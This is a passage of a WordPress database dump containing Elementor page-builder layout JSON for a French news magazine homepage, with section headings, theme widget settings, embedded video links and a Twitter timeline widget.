\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2281,742,'_elementor_version','0.4'),(2282,742,'_elementor_css','a:3:{s:4:\"time\";i:1509369111;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2284,743,'_elementor_edit_mode','builder'),(2285,743,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"38qoe55\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"orderby\":\"meta_value\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"t